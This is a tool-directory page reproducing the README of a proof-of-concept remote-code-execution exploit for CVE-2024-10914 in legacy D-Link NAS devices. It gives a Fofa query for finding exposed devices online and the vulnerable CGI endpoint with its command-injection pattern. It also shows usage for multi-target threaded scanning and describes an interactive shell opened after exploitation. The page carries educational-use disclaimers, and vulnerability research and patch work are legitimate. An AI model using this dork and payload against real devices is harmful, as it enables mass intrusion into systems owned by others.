Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/themehackers/cve-2024-10914
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & Education
GitHubthemehackers/cve-2024-10914

CVE-2024-10914

CVE-2024-10914 is a critical command injection vulnerability affecting several legacy D-Link Network Attached Storage (NAS) devices.

View Repository
921 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
CVE-2024-10914 — CVE-2024-10914 is a critical command injection vulnerability affecting several legacy D-Link Network Attached Storage (NAS) devices. | Kitploit

CVE-2024-10914 - D-Link Remote Code Execution (RCE) Exploit

This script is a proof-of-concept (PoC) exploit for CVE-2024-10914, a remote code execution vulnerability in certain D-Link devices. The script identifies and exploits vulnerable devices to execute arbitrary commands.

Note: This script should only be used for educational purposes or in authorized environments. Unauthorized exploitation of this vulnerability may be illegal and unethical.


root@kitploit:~
Finding Targets
To find potential targets, use Fofa (similar to Shodan.io):

Fofa Dork: app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

Features

  • Vulnerability Check: The script can check if a target is vulnerable to CVE-2024-10914.
  • Exploit: Exploit the vulnerability by sending payloads to gain remote command execution.
  • Interactive Shell: After exploitation, an interactive shell is started for executing further commands.
  • Multi-target Scanning: Scan multiple targets from a file using multiple threads for faster vulnerability detection.

Requirements

  • Python 3.x
  • requests (for HTTP requests)
  • alive-progress (for progress bars)
  • prompt_toolkit (for the interactive shell)
  • argparse (for handling command-line arguments)

To install required libraries, use:

root@kitploit:~
pip3 install -r requirements.txt

Command-Line Arguments

root@kitploit:~
usage: exploit.py [-h] [-u URL] [-f FILE] [-t THREADS] [-p PORT]

A PoC exploit for CVE-2024-10914 - D-Link Remote Code Execution (RCE)

optional arguments:
  -h, --help            Show this help message and exit
  -u URL, --url URL     Single target IP to test (e.g., 192.168.1.1)
  -f FILE, --file FILE  File containing list of target IPs to scan
  -t THREADS, --threads THREADS
                        Number of threads to use for scanning (default: 5)
  -p PORT, --port PORT  Port to target (default: 80)

Example Usage

  • Check a Single Target:
root@kitploit:~
python3 exploit.py -u 192.168.1.100 -p 80

Scan Multiple Targets from a File

root@kitploit:~
python3 exploit.py -f targets.txt -p 80 -t 10

Exploit Details

This script attempts to exploit a vulnerability in D-Link devices, specifically targeting the following

  • Vulnerable Endpoint: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';{};'
  • Payloads: Various system commands (id, uname -a, hostname, cat /proc/cpuinfo, etc.) The exploit is carried out by injecting system commands into the vulnerable endpoint, triggering the remote execution of arbitrary commands on the target device

Disclaimer

This script is for educational purposes only. Do not use this script on systems or networks you do not have explicit permission to test.

The authors are not responsible for any misuse of this tool.

For more details, please refer to the official GitHub repository: https://github.com/ThemeHackers/CVE-2024-10914

Contributing

If you find any issues or want to contribute, feel free to open an issue or submit a pull request on the GitHub repository.

License

This project is licensed under the MIT License - see the LICENSE file for details

Key Sections of the README:

root@kitploit:~
MIT License

Copyright (c) 2024 ds_zct

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Download Tool